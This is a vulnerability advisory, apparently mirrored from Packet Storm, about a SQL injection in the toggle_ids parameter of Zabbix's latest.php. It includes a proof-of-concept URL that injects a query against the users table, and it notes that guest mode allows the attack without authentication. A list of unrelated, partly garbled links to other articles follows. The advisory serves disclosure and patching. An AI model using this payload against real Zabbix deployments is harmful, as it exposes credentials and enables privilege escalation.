Zabbix version 3.0.3 suffers from a remote SQL injection vulnerability.

==========================================

Title: Zabbix 3.0. SQL Injection Vulnerability

Product: Zabbix

Vulnerable Version(s): 2.2.x, 3.0.x

Fixed Version: 3.0.

Homepage: http://www.zabbix.com

Patch link: https://support.zabbix.com/browse/ZBX-11023

Credit: 1N3@CrowdShield

==========================================

Vendor Description:

=====================

Zabbix is an open source availability and performance monitoring solution. 

Vulnerability Overview:

=====================

Zabbix 2.2.x, 3.0.x and trunk suffers from a remote SQL injection vulnerability due to a failure to sanitize input in the toggle_ids array in the latest.php page.

Business Impact:

=====================

By exploiting this SQL injection vulnerability, an authenticated attacker (or guest user) is able to gain full access to the database. This would allow an attacker to escalate their privileges to a power user, compromise the database, or execute commands on the underlying database operating system.

Because of the functionalities Zabbix offers, an attacker with admin privileges (depending on the configuration) can execute arbitrary OS commands on the configured Zabbix hosts and server. This results in a severe impact to the monitored infrastructure.

Although the attacker needs to be authenticated in general, the system could also be at risk if the adversary has no user account. Zabbix offers a guest mode which provides a low privileged default account for users without password. If this guest mode is enabled, the SQL injection vulnerability can be exploited unauthenticated.

Proof of Concept:

=====================

latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=&toggle_ids[]=); select * from users where (=

Result:

SQL (0.000361): INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (, , 'web.latest.toggle', '', , ); select * from users where (=)

latest.php: a require_once() a CProfile::flush() a CProfile::insertDB() a DBexecute() in /home/sasha/zabbix-svn/branches/2.2/frontends/php/include/profiles.inc.php:

Disclosure Timeline:

=====================

// - Reported vulnerability to Zabbix

// - Zabbix responded with permission to file CVE and to disclose after a patch is made public

// - Zabbix released patch for vulnerability

// - CVE details submitted

// - Vulnerability details disclosed

referer:https://packetstormsecurity.com/files/138312

Zabbix 3.0.3 SQL Injection的更多相关文章

  1. PHP+MYSQL网站SQL Injection攻防

    程序员们写代码的时候讲究TDD(测试驱动开发):在实现一个功能前,会先写一个测试用例,然后再编写代码使之运行通过.其实当黑客SQL Injection时,同样是一个TDD的过程:他们会先尝试着让程序报 ...

  2. SQL Injection(SQL注入漏洞)

    审计前准备: 1.安�php程序(推荐phpStudy) 2.高亮编辑器(推荐 Sublimetext Notepad++) 3.新建一个文本,复制以下变量,这些变量是审计中需要在源码中寻找的 ### ...

  3. zabbix 3.0 安装 ubuntu环境

    zabbix 3.0 安装 标签(空格分隔): 开发 [TOC] 下载deb # wget http://repo.zabbix.com/zabbix/3.0/ubuntu/pool/main/z/z ...

  4. HP+MYSQL网站SQL Injection攻防

    WebjxCom提示:程序员们写代码的时候讲究TDD(测试驱动开发):在实现一个功能前,会先写一个测试用例,然后再编写代码使之运行通过.其实当黑客SQL Injection时,同样是一个TDD的过程: ...

  5. [转]Zabbix 3.0 安装笔记

    Zabbix 3.0 只支持CentOS 7.0以上版本,所以先在虚拟机中安装好CentOS 7.0 x64,并设置好IP,允许虚拟机联网. 1.安装MySQL 从最新版本的linux系统开始,默认的 ...

  6. Cacti /graphs_new.php SQL Injection Vulnerability

    catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 other SQL injection vulnerability ...

  7. ecshop /search.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 ECSHOP商城系统Search.php页面过滤不严导致SQL注入漏洞 ...

  8. ecshop /pick_out.php SQL Injection Vul By Local Variable Overriding

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 在进行输入变量本地模拟注册的时候,没有进行有效的GPC模拟过滤处理,导出 ...

  9. zabbix 3.0快速安装简介(centos 6)

    zabbix快速安装 系统版本:centos 6 1.yum源配置和zabbix.msyql安装 rpm -ivh http://mirrors.aliyun.com/zabbix/zabbix/3. ...

随机推荐

  1. ios-实现项目在开发、测试、正式环境快速部署

    快速部署:简单的来说,就是不用更改开发.测试.正式环境下的 url ,来实现在同一台测试手机快速部署三种项目状态. Bundle ID一样只会出现一个app:不一样会出现三个app: 具体步骤: 一. ...

  2. 优秀API设计的十大原则

    优秀API设计的十大原则 2015-09-23    分类:编程开发.设计模式.首页精华暂无人评论 分享到:更多4 二十万年薪PHP工程师培养计划 成为被疯抢的Android牛人 风中叶讲Java重难 ...

  3. [原创]CI持续集成系统环境---部署gerrit环境完整记录

    开发同事提议在线上部署一套gerrit代码审核环境,不用多说,下面就是自己部署gerrit的操作记录. 提前安装好java环境,mysql环境,nginx环境 测试系统:centos6.5 下载下面三 ...

  4. 将IIS 7,IIS 8运行在32位

    win2008及win2012的IIS运行在32状态下,原因是ASP程序必须在32位下才能使用ACCESS, 只有在32位下,myodbc才会正常,注意,MySQL必须用32位版本. 设置办法: 打开 ...

  5. App_global.asax.pdb: 另一个程序正在使用此文件,进程无法访问。

    页面修改后,浏览报错,信息如下. 编译错误 说明: 在编译向该请求提供服务所需资源的过程中出现错误.请检查下列特定错误详细信息并适当地修改源代码. 编译器错误消息: CS0042: 创建调试信息文件“ ...

  6. [Android Tips] 4. Dismiss PopupWindow when touch outside

    PopupWindow.setFocusable(true);

  7. 重启redis报错:Waiting for Redis to shutdown

    重启redis,发现一直报:Waiting for Redis to shutdown service redis_6379 restart Stopping ... OK (error) NOAUT ...

  8. windows系统调用 临界区机制

    #include "iostream" #include "windows.h" #include "cstring" using name ...

  9. js __proto 和prototype

    prototype是函数的一个属性(每个函数都有一个prototype属性),这个属性是一个指针,指向一个对象.它是显示修改对象的原型的属性. __proto__是一个对象拥有的内置属性(请注意:pr ...

  10. zTree插件之多选下拉菜单代码

    zTree插件之多选下拉菜单代码 css和js <!--ztree树结构--> <link rel="stylesheet" type="text/cs ...